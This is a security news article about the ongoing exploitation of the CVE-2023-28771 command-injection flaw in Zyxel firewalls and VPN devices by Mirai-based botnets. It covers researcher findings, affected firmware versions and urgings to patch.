Posted on July 24, 2023 at 5:19 PM
Organizations With Unpatched Flaw On Zyxel Devices Continue To Be Exploited
Zyxel devices were targeted by a security exploit using a 9.8-severity vulnerability. The flaw exists in the network devices created by Zyxel, and a large number of these devices have continued to be exploited by hackers. These devices are being targeted to be used as botnets that will launch distributed denial-of-service (DDoS) attacks.
Zyxel devices continue to be exploited by hackers
Zyxel released a patch for the security flaw on April 25. However, weeks after the patch was released, a report by Shadowserver said many Zyxel firewalls and VPN servers were affected by hacking campaigns. At the time, Shadowserver warned that if a user was using a vulnerable device, they needed to assume that they were compromised.
A recent report by Fortinet has warned that the threat facing Zyxel devices was still alive. The Fortinet security company noted that there was an increase in the hacking activity being conducted by several threat actor groups in recent weeks.
The assessment of Fortinet appeared to be the same as the one made by Shadowserver, as it noted that these attacks came from variants of the Mirai malware. The Mirai malware is usually used by hackers to detect and exploit the vulnerabilities existing on routers and Internet of Things (IoT) devices.
If the Mirai malware is successful in conducting these hacking campaigns, it corals the devices into botnets that will deliver DDoS attacks with massive volumes. Researchers have been urging organizations that are yet to deploy the patch to do so because of the increased likelihood of an exploit.
In June, cybersecurity researchers released an exploit code that could be downloaded and exploited within the botnet software. While the threat was clear and imminent, a large number of devices were yet to install the patch, and exploits had continued to increase.
One of the security researchers at Fortinet, Cara Lin, noted that since the exploit module was published, there has been a significant increase in malicious activity. The researcher noted that an analysis conducted by FortiGuard Labs had noted there was an increase in the attack bursts from May.
“We also identified multiple botnets, including Dark.IoT, a variant based on Mirai, as well as another botnet that employs customized DDoS attack methods,” Lin said. The researcher noted that the hackers were exploiting the vulnerability tracked as CVE-2023-28771 to deploy the payload.
The CVE-2023-28771 vulnerability is used to compromise Zyxel devices. The unauthenticated command-injection flaw has a severity rating of 9.8, and it can be exploited using a specially crafted IKEv2 packet to the UDP port 500 of the targeted device to run a malicious code.
According to Lin, “The presence of exposed vulnerabilities in devices can lead to significant risks. Once an attacker gains control over a vulnerable device, they can incorporate it into their botnet, enabling them to execute additional attacks, such as DDoS. To effectively address this threat, it is crucial to prioritize the application of patches and updates whenever possible.”
Many devices are still exposed to the flaw
Zyxel has already disclosed the flaw, and it issued a patch to address the issue. The flaw exists within the default configurations of the firewall of the manufacturer and VPN devices, and once the exploit is done, it creates a botnet used to run DDoS campaigns.
The devices that are vulnerable to this security exploit include Zyxel ZyWALL/USG series firmware versions 4.60 to 4.73. It has also affected VPN series firmware versions 4.60 to 5.35, USG FLEX series firmware versions 4.60 to 5.35, and ATP series firmware versions 4.60 to 5.35.
According to Lin, over the past month, the number of attacks exploiting the CVE-2023-28771 security flaw came from distinct IP addresses and targeted the command-injection feature within an Internet Key Exchange packet that is transmitted by the Zyxel devices. The attacks are being conducted using a wide range of tools like curl and wget.
The curl and wget tools will download malicious scripts from servers that are controlled by the hacker. The flaw in question is not only being exploited by the Dark.IoT botnet software. The other botnet software exploiting this flaw include Katana and Rapperbot. The actors behind the Katana software operate a Telegram channel.
The exploits being conducted using these botnets can be executed directly on sensitive security devices. As such, one needs to assume that the affected organization might have already installed a patch for the vulnerability. The successful exploits of these organizations show that the patch is yet to be installed.